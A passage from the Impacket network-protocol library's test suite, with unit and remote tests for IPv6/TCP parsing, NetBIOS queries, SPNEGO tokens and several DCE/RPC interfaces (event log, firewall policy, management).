14 | class TestIP6(unittest.TestCase):
15 |
16 | def setUp(self):
17 | #Version 6, traffic class 72, flow label 148997, payload length 1500
18 | #next header 17 (UDP), hop limit 1
19 | #source addr FE80::78F8:89D1:30FF:256B
20 | #dest addr FF02::1:3
21 | self.binary_packet = [
22 | 0x64, 0x82, 0x46, 0x05,
23 | 0x05, 0xdc, 0x11, 0x01,
24 | 0xfe, 0x80, 0x00, 0x00,
25 | 0x00, 0x00, 0x00, 0x00,
26 | 0x78, 0xf8, 0x89, 0xd1,
27 | 0x30, 0xff, 0x25, 0x6b,
28 | 0xff, 0x02, 0x00, 0x00,
29 | 0x00, 0x00, 0x00, 0x00,
30 | 0x00, 0x00, 0x00, 0x00,
31 | 0x00, 0x01, 0x00, 0x03]
32 |
33 | def test_decoding(self):
34 | '''Test IP6 Packet decoding.'''
35 |
36 |
37 | d = ImpactDecoder.IP6Decoder()
38 | parsed_packet = d.decode(self.binary_packet)
39 |
40 | protocol_version = parsed_packet.get_ip_v()
41 | traffic_class = parsed_packet.get_traffic_class()
42 | flow_label = parsed_packet.get_flow_label()
43 | payload_length = parsed_packet.get_payload_length()
44 | next_header = parsed_packet.get_next_header()
45 | hop_limit = parsed_packet.get_hop_limit()
46 | source_address = parsed_packet.get_ip_src()
47 | destination_address = parsed_packet.get_ip_dst()
48 |
49 | self.assertEqual(protocol_version, 6, "IP6 parsing - Incorrect protocol version")
50 | self.assertEqual(traffic_class, 72, "IP6 parsing - Incorrect traffic class")
51 | self.assertEqual(flow_label, 148997, "IP6 parsing - Incorrect flow label")
52 | self.assertEqual(payload_length, 1500, "IP6 parsing - Incorrect payload length")
53 | self.assertEqual(next_header, 17, "IP6 parsing - Incorrect next header")
54 | self.assertEqual(hop_limit, 1, "IP6 parsing - Incorrect hop limit")
55 | self.assertEqual(source_address.as_string(), "FE80::78F8:89D1:30FF:256B", "IP6 parsing - Incorrect source address")
56 | self.assertEqual(destination_address.as_string(), "FF02::1:3", "IP6 parsing - Incorrect destination address")
57 |
58 | def test_creation(self):
59 | '''Test IP6 Packet creation.'''
60 |
61 | crafted_packet = IP6.IP6()
62 | crafted_packet.set_traffic_class(72)
63 | crafted_packet.set_flow_label(148997)
64 | crafted_packet.set_payload_length(1500)
65 | crafted_packet.set_next_header(17)
66 | crafted_packet.set_hop_limit(1)
67 | crafted_packet.set_ip_src("FE80::78F8:89D1:30FF:256B")
68 | crafted_packet.set_ip_dst("FF02::1:3")
69 | crafted_buffer = crafted_packet.get_bytes().tolist()
70 | self.assertEqual(crafted_buffer, self.binary_packet, "IP6 creation - Buffer mismatch")
71 |
72 |
73 | if __name__ == '__main__':
74 | unittest.main(verbosity=1)
75 |
--------------------------------------------------------------------------------
/impacket/tests/ImpactPacket/test_TCP_bug_issue7.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from threading import Thread
12 | from impacket.ImpactPacket import TCP, ImpactPacketException
13 |
14 |
class TestTCP(unittest.TestCase):
    # Regression test for a parser hang: a TCP option with kind 2 (Maximum
    # Segment Size) and length 0 must not make option parsing loop forever.

    def setUp(self):
        # Dummy TCP header with "Maximum Segment Size" Option and zero length
        self.frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00'

    def test_01(self):
        'Test TCP options parsing hangs'
        def parse_frame():
            # Runs in a worker thread so that a hang cannot block the test run
            try:
                frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00' \
                        '\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00'
                TCP(frame)
            except ImpactPacketException as e:
                if str(e) != "'TCP Option length is too low'":
                    raise e
            except Exception:
                pass

        worker = Thread(target=parse_frame)
        worker.daemon = True
        worker.start()

        worker.join(1.0)  # 1 seconds timeout
        # Still alive after the timeout means the parser never returned
        self.assertEqual(worker.is_alive(), False)
43 |
44 |
45 | if __name__ == '__main__':
46 | unittest.main(verbosity=1)
47 |
--------------------------------------------------------------------------------
/impacket/tests/SMB_RPC/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 |
--------------------------------------------------------------------------------
/impacket/tests/SMB_RPC/test_nmb.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | import pytest
10 | import unittest
11 | from tests import RemoteTestCase
12 |
13 | from impacket import nmb
14 | from impacket.structure import hexdump
15 |
16 |
# Marked "remote": apart from test_encodedecodename, these tests send NetBIOS
# name-service requests to the host taken from the remote test configuration
# (self.machine / self.serverName - presumably provided by RemoteTestCase;
# verify against tests/__init__.py).
@pytest.mark.remote
class NMBTests(RemoteTestCase, unittest.TestCase):

    def setUp(self):
        super(NMBTests, self).setUp()
        self.set_transport_config()

    def create_connection(self):
        pass

    def test_encodedecodename(self):
        # Local round trip: a name longer than 15 characters is expected to
        # come back truncated to its first 15 characters.
        name = 'THISISAVERYLONGLONGNAME'
        encoded = nmb.encode_name(name, nmb.TYPE_SERVER, None)
        hexdump(encoded)
        decoded = nmb.decode_name(encoded)
        hexdump(bytearray(decoded[1], 'utf-8'))

        #self.assertEqual(nmb.TYPE_SERVER, decoded[0])
        self.assertEqual(name[:15], decoded[1].strip())

        # ToDo: Fix the scope functionality
        #namescope = 'MYNAME'
        #encoded = nmb.encode_name(namescope,nmb.TYPE_SERVER,'SCOPE')
        #hexdump(encoded)
        #decoded = nmb.decode_name(encoded)
        #hexdump(decoded)

        #self.assertEqual(nmb.TYPE_SERVER, decoded[0])
        #self.assertEqual(namescope[:15], decoded[1].strip())

    def test_getnetbiosname(self):
        n = nmb.NetBIOS()
        res = n.getnetbiosname(self.machine)
        print(repr(res))
        self.assertEqual(self.serverName, res)

    def test_getnodestatus(self):
        # No assertion: passes as long as the query and dump() do not raise
        n = nmb.NetBIOS()
        resp = n.getnodestatus(self.serverName.upper(), self.machine)
        for r in resp:
            r.dump()
        print(resp)

    def test_gethostbyname(self):
        # No assertion: passes as long as the lookup does not raise
        n = nmb.NetBIOS()
        n.set_nameserver(self.serverName)
        resp = n.gethostbyname(self.serverName, nmb.TYPE_SERVER)
        print(resp.entries)

    def test_name_registration_request(self):
        n = nmb.NetBIOS()
        # ToDo: Look at this
        #resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1')
        try:
            resp = n.name_registration_request('*JSMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_ONT_P, '1.1.1.2')
            resp.dump()
        except Exception as e:
            print(str(e))
            # Errors whose text contains 'NETBIOS' are tolerated.
            # NOTE(review): find() returns 0 when the text *starts* with
            # 'NETBIOS', and `<= 0` re-raises in that case too - confirm
            # whether `< 0` was intended.
            if str(e).find('NETBIOS') <= 0:
                raise e

    def test_name_query_request(self):
        # No assertion: passes as long as the query does not raise
        n = nmb.NetBIOS()
        # ToDo: Look at this
        # resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1')
        resp = n.name_query_request(self.serverName, self.machine)
        print(resp.entries)
86 | if __name__ == "__main__":
87 | unittest.main(verbosity=1)
88 |
--------------------------------------------------------------------------------
/impacket/tests/SMB_RPC/test_spnego.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | import unittest
10 | from impacket import smb
11 |
12 |
13 | class Test(unittest.TestCase):
14 |
15 | def setUp(self):
16 | self.negTokenInit = b'\x60\x28\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x1e\x30\x1c\xa0\x1a\x30\x18\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a'
17 |
18 | self.negTokenInit2 = b'\x60\x4d\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x43\x30\x41\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2f\x04\x2d\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x15\x82\x08\x60\x09\x00\x09\x00\x20\x00\x00\x00\x04\x00\x04\x00\x29\x00\x00\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55\x50\x4a\x41\x43\x4b'
19 |
20 | self.negTokenResp1 = b'\xa1\x82\x01\x0b\x30\x82\x01\x07\xa0\x03\x0a\x01\x01\xa1\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x81\xf1\x04\x81\xee\x4e\x54\x4c\x4d\x53\x53\x50\x00\x02\x00\x00\x00\x1e\x00\x1e\x00\x38\x00\x00\x00\x15\x82\x8a\x62\x29\x93\x18\x15\x3d\x3b\x0d\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x98\x00\x56\x00\x00\x00\x06\x01\xb1\x1d\x00\x00\x00\x0f\x57\x00\x49\x00\x4e\x00\x2d\x00\x41\x00\x36\x00\x4b\x00\x50\x00\x55\x00\x30\x00\x54\x00\x31\x00\x52\x00\x36\x00\x53\x00\x02\x00\x1e\x00\x57\x00\x49\x00\x4e\x00\x2d\x00\x41\x00\x36\x00\x4b\x00\x50\x00\x55\x00\x30\x00\x54\x00\x31\x00\x52\x00\x36\x00\x53\x00\x01\x00\x1e\x00\x57\x00\x49\x00\x4e\x00\x2d\x00\x41\x00\x36\x00\x4b\x00\x50\x00\x55\x00\x30\x00\x54\x00\x31\x00\x52\x00\x36\x00\x53\x00\x04\x00\x1e\x00\x57\x00\x49\x00\x4e\x00\x2d\x00\x41\x00\x36\x00\x4b\x00\x50\x00\x55\x00\x30\x00\x54\x00\x31\x00\x52\x00\x36\x00\x53\x00\x03\x00\x1e\x00\x57\x00\x49\x00\x4e\x00\x2d\x00\x41\x00\x36\x00\x4b\x00\x50\x00\x55\x00\x30\x00\x54\x00\x31\x00\x52\x00\x36\x00\x53\x00\x07\x00\x08\x00\x52\xe8\x2b\x20\x70\x30\xcd\x01\x00\x00\x00\x00'
21 |
22 | self.negTokenResp2 = b'\xa1\x81\xab\x30\x81\xa8\xa2\x81\xa5\x04\x81\xa2\x4e\x54\x4c\x4d\x53\x53\x50\x00\x03\x00\x00\x00\x18\x00\x18\x00\x40\x00\x00\x00\x18\x00\x18\x00\x58\x00\x00\x00\x12\x00\x12\x00\x70\x00\x00\x00\x08\x00\x08\x00\x82\x00\x00\x00\x08\x00\x08\x00\x8a\x00\x00\x00\x10\x00\x10\x00\x92\x00\x00\x00\x15\x82\x08\x60\x24\x7f\xec\x6e\x53\x09\x86\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x99\x24\xd3\x12\xd5\x95\xe1\x33\xba\xfa\x00\x3e\xe3\xfd\x58\x63\xbd\x3e\x83\x0d\x4e\x71\xdc\x57\x00\x4f\x00\x52\x00\x4b\x00\x47\x00\x52\x00\x4f\x00\x55\x00\x50\x00\x74\x00\x65\x00\x73\x00\x74\x00\x4a\x00\x41\x00\x43\x00\x4b\x00\x32\xd2\x67\xd6\xa5\xa9\x4b\x97\x2a\xaf\x45\xee\x87\x58\x0c\x6d'
23 |
24 | self.negTokenResp3 = b'\xa1\x07\x30\x05\xa0\x03\x0a\x01\x00'
25 |
26 | self.negTokenResp4 = b'\xa1\x15\x30\x13\xa0\x03\x0a\x01\x03\xa1\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a'
27 |
28 | def test_negTokenInit(self):
29 | token = smb.SPNEGO_NegTokenInit()
30 | token.fromString(self.negTokenInit)
31 | self.assertEqual(self.negTokenInit, token.getData())
32 |
def test_negTokenInit2(self):
    """Round-trip the second NegTokenInit fixture through parse and serialise."""
    fixture = self.negTokenInit2
    parsed = smb.SPNEGO_NegTokenInit()
    parsed.fromString(fixture)
    self.assertEqual(fixture, parsed.getData())
37 |
def test_negTokenResp1(self):
    """Round-trip the NegTokenResp fixture that embeds an NTLMSSP message.

    The fixture bytes contain the ``NTLMSSP\\x00`` signature; the response
    token must re-serialise to exactly the same bytes.
    """
    fixture = self.negTokenResp1
    parsed = smb.SPNEGO_NegTokenResp()
    parsed.fromString(fixture)
    self.assertEqual(fixture, parsed.getData())
42 |
def test_negTokenResp2(self):
    """Round-trip the second NegTokenResp fixture through parse and serialise."""
    fixture = self.negTokenResp2
    parsed = smb.SPNEGO_NegTokenResp()
    parsed.fromString(fixture)
    self.assertEqual(fixture, parsed.getData())
47 |
def test_negTokenResp3(self):
    """Round-trip the short NegTokenResp fixture that carries only a state field."""
    fixture = self.negTokenResp3
    parsed = smb.SPNEGO_NegTokenResp()
    parsed.fromString(fixture)
    self.assertEqual(fixture, parsed.getData())
52 |
def test_negTokenResp4(self):
    """Build a NegTokenResp from fields and compare it with the expected bytes.

    Unlike the round-trip tests, nothing is parsed here: the token is filled
    in by hand and only the serialiser is exercised.
    """
    ntlm_mech = smb.TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
    built = smb.SPNEGO_NegTokenResp()
    built['NegState'] = b'\x03'  # request-mic
    built['SupportedMech'] = ntlm_mech
    self.assertEqual(self.negTokenResp4, built.getData())
58 |
59 |
60 | if __name__ == "__main__":
61 | unittest.main(verbosity=1)
62 |
--------------------------------------------------------------------------------
/impacket/tests/conftest.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Copyright (C) 2023 Fortra. All rights reserved.
3 | #
4 | # This software is provided under a slightly modified version
5 | # of the Apache Software License. See the accompanying LICENSE file
6 | # for more information.
7 | #
8 | # Tests configuration
9 | #
10 | import pytest
11 | from . import set_remote_config_file_path, set_transport_config
12 |
13 |
def pytest_configure(config):
    """Hook that picks the remote configuration file and applies it to `config`.

    The ``--remote-config`` command line option is consulted first; the
    ``remote-config`` ini option is read only when the command line gave
    nothing. The transport configuration is applied to the pytest `config`
    object whether or not a file path was found.
    """
    remote_path = config.getoption("--remote-config") or config.getini("remote-config")
    if remote_path:
        set_remote_config_file_path(remote_path)
    set_transport_config(config)
24 |
25 |
def pytest_addoption(parser):
    """Hook that registers the remote configuration file setting with pytest.

    The same setting is exposed twice: as the ``--remote-config`` command line
    option and as the ``remote-config`` ini option.
    """
    description = "Configuration file for remote tests"
    parser.addoption("--remote-config", dest="remote_config", metavar="FILE",
                     help=description)
    parser.addini("remote-config", help=description, type="pathlist")
33 |
34 |
@pytest.fixture(scope="class", name="remote")
def remote_config(request):
    """Class-scoped fixture, requested as ``remote``, for remote test cases.

    Applies the transport configuration to the requesting test class so the
    tests can read the settings as attributes.
    """
    test_class = request.cls
    set_transport_config(test_class)
42 |
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v1
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v2
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v3
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v3-kirbi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v3-kirbi
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v4
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v4-kirbi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v4-kirbi
--------------------------------------------------------------------------------
/impacket/tests/dcerpc/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Base class for testing DCE/RPC Endpoints.
12 | #
13 | # Author:
14 | # @martingalloar
15 | #
16 | from tests import RemoteTestCase
17 |
18 | from impacket.dcerpc.v5 import transport, epm
19 |
20 |
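class DCERPCTests(RemoteTestCase):
    """Base class for test cases that talk to a DCE/RPC endpoint.

    Subclasses configure a test run through the class attributes below and
    call :meth:`connect` from their test methods. The credentials passed to
    the transport (``username``, ``password``, ``domain``, ``lmhash``,
    ``nthash``) and ``machine`` are not defined here; they are presumably set
    by ``set_transport_config`` from the remote test configuration (confirm
    against ``RemoteTestCase``).
    """

    # How setUp() derives the final string binding.
    STRING_BINDING_FORMATTING = 1  # fill the string_binding template via str.format(self)
    STRING_BINDING_MAPPER = 2      # ask epm.hept_map() for the binding

    # (UUID, version) pairs handed to dce.bind() as transfer_syntax.
    TRANSFER_SYNTAX_NDR = ("8a885d04-1ceb-11c9-9fe8-08002b104860", "2.0")
    TRANSFER_SYNTAX_NDR64 = ("71710533-BEBA-4937-8319-B5DBEF9CCC36", "1.0")

    timeout = None          # connect timeout; falsy means it is never set
    authn = False           # when true, credentials are set on the transport
    authn_level = None      # when set, passed to dce.set_auth_level()
    iface_uuid = None       # interface to bind to after connecting
    protocol = None         # protocol passed to epm.hept_map() in mapper mode
    string_binding = None   # binding template (formatting mode) or final binding
    string_binding_formatting = STRING_BINDING_FORMATTING
    transfer_syntax = None  # one of the TRANSFER_SYNTAX_* pairs, or None
    machine_account = False

    def connect(self, string_binding=None, iface_uuid=None):
        """Obtains a RPC Transport and a DCE interface according to the bindings and
        transfer syntax specified.

        :param string_binding: binding to use instead of ``self.string_binding``
        :param iface_uuid: interface to bind instead of ``self.iface_uuid``
        :raises NotImplementedError: when no string binding is available
        :return: tuple of DCE/RPC and RPC Transport objects
        :rtype: (DCERPC_v5, DCERPCTransport)
        """
        string_binding = string_binding or self.string_binding
        if not string_binding:
            # NotImplemented is a comparison sentinel, not an exception class:
            # calling it fails with a TypeError that hides this message.
            raise NotImplementedError("String binding must be defined")

        rpc_transport = transport.DCERPCTransportFactory(string_binding)

        # Set timeout if defined
        if self.timeout:
            rpc_transport.set_connect_timeout(self.timeout)

        # Authenticate if specified
        if self.authn and hasattr(rpc_transport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash)

        # Gets the DCE RPC object
        dce = rpc_transport.get_dce_rpc()

        # Set the authentication level; with authn_level unset nothing is
        # requested here and the DCE object keeps whatever level it starts with.
        if self.authn_level:
            dce.set_auth_level(self.authn_level)

        # Connect
        dce.connect()

        # Bind if specified
        iface_uuid = iface_uuid or self.iface_uuid
        if iface_uuid and self.transfer_syntax:
            dce.bind(iface_uuid, transfer_syntax=self.transfer_syntax)
        elif iface_uuid:
            dce.bind(iface_uuid)

        return dce, rpc_transport

    def setUp(self):
        """Load the transport configuration and resolve ``self.string_binding``."""
        super(DCERPCTests, self).setUp()
        self.set_transport_config(machine_account=self.machine_account)

        if self.string_binding_formatting == self.STRING_BINDING_FORMATTING:
            # A subclass without a template is left alone so that connect()
            # reports the missing binding, instead of None.format() failing here.
            if self.string_binding:
                self.string_binding = self.string_binding.format(self)
        elif self.string_binding_formatting == self.STRING_BINDING_MAPPER:
            self.string_binding = epm.hept_map(self.machine, self.iface_uuid, protocol=self.protocol)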
88 |
--------------------------------------------------------------------------------
/impacket/tests/dcerpc/test_even6.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Tested so far:
10 | # (h)EvtRpcRegisterLogQuery
11 | # (h)EvtRpcQueryNext
12 | # Not yet
13 | # EvtRpcQuerySeek
14 | # EvtRpcClose
15 | # EvtRpcOpenLogHandle
16 | # EvtRpcGetChannelList
17 | #
18 | from __future__ import division
19 | from __future__ import print_function
20 | import pytest
21 | import unittest
22 | from six.moves import xrange
23 |
24 | from tests.dcerpc import DCERPCTests
25 |
26 | from impacket.dcerpc.v5 import even6
27 | from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
28 |
29 |
class EVEN6Tests(DCERPCTests):
    """Tests for the EVEN6 interface: register a log query, then fetch records.

    Both tests query the ``Security`` channel, newest record first, over an
    authenticated connection at ``RPC_C_AUTHN_LEVEL_PKT_PRIVACY``. They make no
    assertion about the returned events; a test passes when every request and
    every record slice completes without raising.
    """
    iface_uuid = even6.MSRPC_UUID_EVEN6
    protocol = "ncacn_ip_tcp"
    string_binding_formatting = DCERPCTests.STRING_BINDING_MAPPER
    string_binding = r"ncacn_np:{0.machine}[\PIPE\eventlog]"
    authn = True
    authn_level = RPC_C_AUTHN_LEVEL_PKT_PRIVACY

    def _walk_records(self, resp):
        """Slice each returned record out of ``ResultBuffer`` using its offset and size."""
        for idx in xrange(resp['NumActualRecords']):
            start = resp['EventDataIndices'][idx]['Data']
            length = resp['EventDataSizes'][idx]['Data']
            _record = resp['ResultBuffer'][start:start + length]

    def test_EvtRpcRegisterLogQuery_EvtRpcQueryNext(self):
        """Drive both calls through hand-built request structures."""
        dce, _ = self.connect()

        register = even6.EvtRpcRegisterLogQuery()
        register['Path'] = 'Security\x00'
        register['Query'] = '*\x00'
        register['Flags'] = even6.EvtQueryChannelName | even6.EvtReadNewestToOldest
        register.dump()

        registered = dce.request(register)
        registered.dump()
        handle = registered['Handle']

        fetch = even6.EvtRpcQueryNext()
        fetch['LogQuery'] = handle
        fetch['NumRequestedRecords'] = 5
        fetch['TimeOutEnd'] = 1000
        fetch['Flags'] = 0
        fetch.dump()

        fetched = dce.request(fetch)
        fetched.dump()

        self._walk_records(fetched)

    def test_hEvtRpcRegisterLogQuery_hEvtRpcQueryNext(self):
        """Drive the same two calls through the ``h*`` helper functions."""
        dce, _ = self.connect()

        flags = even6.EvtQueryChannelName | even6.EvtReadNewestToOldest
        registered = even6.hEvtRpcRegisterLogQuery(dce, 'Security\x00', flags, '*\x00')
        registered.dump()
        handle = registered['Handle']

        fetched = even6.hEvtRpcQueryNext(dce, handle, 5, 1000)
        fetched.dump()

        self._walk_records(fetched)
82 |
83 |
@pytest.mark.remote
class EVEN6TestsTCPTransport(EVEN6Tests, unittest.TestCase):
    """EVEN6 tests bound with the NDR transfer syntax; marked as remote."""

    transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR
87 |
88 |
@pytest.mark.remote
class EVEN6TestsTCPTransport64(EVEN6Tests, unittest.TestCase):
    """EVEN6 tests bound with the NDR64 transfer syntax; marked as remote."""

    transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR64
92 |
93 |
94 | # Process command-line arguments.
95 | if __name__ == "__main__":
96 | unittest.main(verbosity=1)
97 |
--------------------------------------------------------------------------------
/impacket/tests/dcerpc/test_fasp.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Tested so far:
10 | # FWOpenPolicyStore
11 | #
12 | # Not yet:
13 | #
14 | import unittest
15 | import pytest
16 | from tests.dcerpc import DCERPCTests
17 |
18 | from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
19 |
20 |
21 | # XXX: This is just to pass tests until we figure out what happened with the
22 | # fasp module
23 | fasp = None
24 |
25 |
@pytest.mark.skip(reason="fasp module unavailable")
class FASPTests(DCERPCTests):
    """Tests for opening and closing a firewall policy store through ``fasp``.

    The whole class is skipped: ``fasp`` is bound to ``None`` at module level,
    so every method here would fail on its first attribute access if run.
    """
    #iface_uuid = fasp.MSRPC_UUID_FASP
    authn = True
    authn_level = RPC_C_AUTHN_LEVEL_PKT_PRIVACY

    def test_FWOpenPolicyStore(self):
        """Open the local policy store with read access via a hand-built request."""
        dce, _ = self.connect()
        open_req = fasp.FWOpenPolicyStore()
        open_req['BinaryVersion'] = 0x0200
        open_req['StoreType'] = fasp.FW_STORE_TYPE.FW_STORE_TYPE_LOCAL
        open_req['AccessRight'] = fasp.FW_POLICY_ACCESS_RIGHT.FW_POLICY_ACCESS_RIGHT_READ
        open_req['dwFlags'] = 0
        reply = dce.request(open_req)
        reply.dump()

    def test_hFWOpenPolicyStore(self):
        """Open the policy store through the helper function."""
        dce, _ = self.connect()
        reply = fasp.hFWOpenPolicyStore(dce)
        reply.dump()

    def test_FWClosePolicyStore(self):
        """Open a store with the helper, then close it via a hand-built request."""
        dce, _ = self.connect()
        opened = fasp.hFWOpenPolicyStore(dce)
        close_req = fasp.FWClosePolicyStore()
        close_req['phPolicyStore'] = opened['phPolicyStore']
        reply = dce.request(close_req)
        reply.dump()

    def test_hFWClosePolicyStore(self):
        """Open and close a store using only the helper functions."""
        dce, _ = self.connect()
        opened = fasp.hFWOpenPolicyStore(dce)
        reply = fasp.hFWClosePolicyStore(dce, opened['phPolicyStore'])
        reply.dump()
60 |
61 |
@pytest.mark.remote
class FASPTestsTCPTransport(FASPTests, unittest.TestCase):
    """FASP tests over ``ncacn_ip_tcp`` with the NDR transfer syntax."""

    transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR
    protocol = "ncacn_ip_tcp"
66 |
67 |
@pytest.mark.remote
class FASPTestsTCPTransport64(FASPTests, unittest.TestCase):
    """FASP tests over ``ncacn_ip_tcp`` with the NDR64 transfer syntax."""

    transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR64
    protocol = "ncacn_ip_tcp"
72 |
73 |
74 | # Process command-line arguments.
75 | if __name__ == "__main__":
76 | unittest.main(verbosity=1)
77 |
--------------------------------------------------------------------------------
/impacket/tests/dcerpc/test_mgmt.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Tested so far:
10 | # (h)inq_if_ids
11 | # (h)inq_stats
12 | # (h)is_server_listening
13 | # (h)stop_server_listening
14 | # (h)inq_princ_name
15 | #
16 | from __future__ import division
17 | from __future__ import print_function
18 | import pytest
19 | import unittest
20 | from six import assertRaisesRegex
21 | from tests.dcerpc import DCERPCTests
22 |
23 | from impacket.dcerpc.v5 import mgmt
24 | from impacket.dcerpc.v5.rpcrt import DCERPCException
25 |
26 |
class MGMTTests(DCERPCTests):
    """Tests for the remote management (``mgmt``) interface.

    Each call is covered twice, once with a hand-built request and once with
    the ``h*`` helper. The two ``stop_server_listening`` tests are the only
    ones with an assertion: they require the call to be refused with
    ``rpc_s_access_denied``. The others only check that the exchange completes.
    """
    iface_uuid = mgmt.MSRPC_UUID_MGMT
    string_binding = r"ncacn_np:{0.machine}[\pipe\epmapper]"
    authn = True

    def test_inq_if_ids(self):
        """Request the interface id list and dump the reply."""
        dce, _ = self.connect()

        reply = dce.request(mgmt.inq_if_ids())
        reply.dump()
        # The per-entry UUID printout that used to follow is disabled; it
        # iterated resp['if_id_vector'] and decoded each entry's 'Data'.

    def test_hinq_if_ids(self):
        """Same call through the helper."""
        dce, _ = self.connect()

        reply = mgmt.hinq_if_ids(dce)
        reply.dump()

    def test_inq_stats(self):
        """Request statistics with ``count`` set to 40."""
        dce, _ = self.connect()

        stats_req = mgmt.inq_stats()
        stats_req['count'] = 40
        reply = dce.request(stats_req)
        reply.dump()

    def test_hinq_stats(self):
        """Same call through the helper."""
        dce, _ = self.connect()

        reply = mgmt.hinq_stats(dce)
        reply.dump()

    def test_is_server_listening(self):
        """Send the request with error checking off and dump whatever comes back."""
        dce, _ = self.connect()

        reply = dce.request(mgmt.is_server_listening(), checkError=False)
        reply.dump()

    def test_his_server_listening(self):
        """Same call through the helper."""
        dce, _ = self.connect()

        reply = mgmt.his_server_listening(dce)
        reply.dump()

    def test_stop_server_listening(self):
